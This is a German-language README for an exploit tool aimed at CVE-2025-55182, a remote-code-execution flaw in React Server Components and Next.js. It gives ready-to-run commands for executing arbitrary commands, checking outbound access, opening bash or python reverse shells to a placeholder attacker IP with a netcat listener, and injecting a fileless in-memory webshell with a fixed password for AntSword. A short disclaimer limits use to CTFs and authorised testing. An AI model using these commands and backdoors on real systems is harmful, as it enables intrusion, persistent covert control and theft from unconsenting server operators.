
Autor: lamaper / BITs2Sys
Version: 1.0.1
Lizenz: MIT
Dieses Tool ist ein automatisiertes Penetrationstest-Tool, das speziell für CVE-2025-55182 (RCE durch Prototype-Pollution in React Server Components / Next.js) entwickelt wurde. Es ist für CTF-Wettbewerbe und autorisierte Sicherheitsdienstprojekte konzipiert und integriert Funktionen wie Schwachstellenverifikation, Outbound-Erkennung, Reverse Shells sowie In-Memory-Webshell-Injektion.
--cmd) : Nutzt den NEXT_REDIRECT-Ausnahmemechanismus, um Base64-kodierte Befehlsausgabeergebnisse präzise zurückzuliefern.--check-outbound) : Automatisierte Tests der Fähigkeit des Zielsystems, auf DNS, HTTP und ICMP zuzugreifen, um die Angriffspfadentscheidung zu unterstützen.--shell) : Integriert zwei Reverse-Shell-Modi (Bash und Python3) mit asynchroner Ausführung, um HTTP-Request-Hänger zu vermeiden.--inject-ms) : Injiziert eine speicherresidente Webshell durch Hijacking des Node.js http.Server-Event-Dispatch-Mechanismus, hinterlässt keine Dateien und ermöglicht persistente Kontrolle.--ms-cmd) : Ein vom Schwachstellen-Trigger-Pfad unabhängiger Interaktionsmodus; nach erfolgreicher Injektion können Befehle direkt über die Hintertür ausgeführt werden.Dieses Tool basiert auf Python 3 und benötigt nur die Installation der requests-Bibliothek.
pip install requests
https://github.com/assetnote/react2shell-scanner ist ein nützliches Erkennungstool.
Direktes Abrufen von Zielsysteminformationen:
python exploit.py --url http://target.com/ --cmd "id"
python exploit.py --url http://target.com/ --cmd "cat /flag"
Vor dem Versuch einer Reverse Shell prüfen, ob das Zielsystem eine Verbindung zum externen Netz herstellen kann:
python exploit.py --url http://target.com/ --check-outbound
Bash-Modus:
# 攻击机执行监听: nc -lvnp 4444
python exploit.py --url http://target.com/ --shell bash --ip <你的IP> --port 4444
Python-Modus:
python exploit.py --url http://target.com/ --shell python --ip <你的IP> --port 4444
Injektion der In-Memory-Webshell:
python exploit.py --url http://target.com/ --inject-ms
Befehlsausführung über die In-Memory-Webshell (nach erfolgreicher Injektion):
python exploit.py --url http://target.com/ --ms-cmd "whoami"
Hinweis: Der Standard-Mount-Pfad der In-Memory-Webshell ist /?pass, ausgelöst durch POST-Parameter pwd.
Verbindung über AntSword (China AntSword):
Verbindungspasswort: pwd, Verbindungsmodus: CMDLINUX
Dieses Tool ist ausschließlich für rechtlich zulässige Sicherheitsforschung, CTF-Wettbewerbe und autorisierte Penetrationstests bestimmt. Die Verwendung für rechtswidrige Angriffe ist strengstens untersagt. Sämtliche Konsequenzen aus der Nutzung dieses Tools trägt allein der Benutzer.